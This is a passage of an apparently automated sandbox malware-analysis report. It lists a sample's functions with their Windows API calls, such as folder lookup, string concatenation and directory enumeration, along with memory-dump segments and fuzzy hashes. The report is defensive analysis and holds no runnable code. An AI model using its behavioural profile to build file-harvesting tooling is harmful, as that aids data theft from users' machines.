                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: 08e55741e75a91d262f1a9568606ff46a6636dbb72a10ea7956d8a98224dada5
                                  • Instruction ID: f2e3a296a5bc51faf63157a29364fa49ae07524105e0f48287729ce66c42ddd5
                                  • Opcode Fuzzy Hash: 08e55741e75a91d262f1a9568606ff46a6636dbb72a10ea7956d8a98224dada5
                                  • Instruction Fuzzy Hash: 9DF03175E44305BBDB10EBB4DC85B9E77F9EB48710F10C194B651EB2C0D6B0A6018B54
                                  Function 00BBC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00BBC74E
                                    • Part of subcall function 00BBBF9F: __amsg_exit.LIBCMT ref: 00BBBFAF
                                  • __getptd.LIBCMT ref: 00BBC765
                                  • __amsg_exit.LIBCMT ref: 00BBC773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00BBC797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 59807d38eaaaedbe60bd0b7821b09af065e4030b370e6cd799d62b0f44b371ef
                                  • Instruction ID: 97d1a3edd8eb19332d0888993baeb56c9752adc3f2026db27c2932c10c3c95e1
                                  • Opcode Fuzzy Hash: 59807d38eaaaedbe60bd0b7821b09af065e4030b370e6cd799d62b0f44b371ef
                                  • Instruction Fuzzy Hash: 15F067329006009BD721BBB99807FFE3BE0AF04721F2441C9F455A72E2CFE49D409E9A
                                  Function 00BB4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4F7A
                                  • lstrcat.KERNEL32(?,00BC1070), ref: 00BB4F97
                                  • lstrcat.KERNEL32(?,01409F20), ref: 00BB4FAB
                                  • lstrcat.KERNEL32(?,00BC1074), ref: 00BB4FBD
                                    • Part of subcall function 00BB4910: wsprintfA.USER32 ref: 00BB492C
                                    • Part of subcall function 00BB4910: FindFirstFileA.KERNEL32(?,?), ref: 00BB4943
                                    • Part of subcall function 00BB4910: StrCmpCA.SHLWAPI(?,00BC0FDC), ref: 00BB4971
                                    • Part of subcall function 00BB4910: StrCmpCA.SHLWAPI(?,00BC0FE0), ref: 00BB4987
                                    • Part of subcall function 00BB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4B7D
                                    • Part of subcall function 00BB4910: FindClose.KERNEL32(000000FF), ref: 00BB4B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: afe050b950ef8d0c75426d1ad52ac7d47d603ce44a19fb1ce4fc3a6ecce42a10
                                  • Instruction ID: c7ea79f8680edb428ed1fb7ada82b0984e8c2ec21a1326a5be1f9d50fd854d11
                                  • Opcode Fuzzy Hash: afe050b950ef8d0c75426d1ad52ac7d47d603ce44a19fb1ce4fc3a6ecce42a10
                                  • Instruction Fuzzy Hash: C1219D7690030867C754FBB4DC86EED33BCA755300F0045D8B699D6191DEB4A6C8CBB2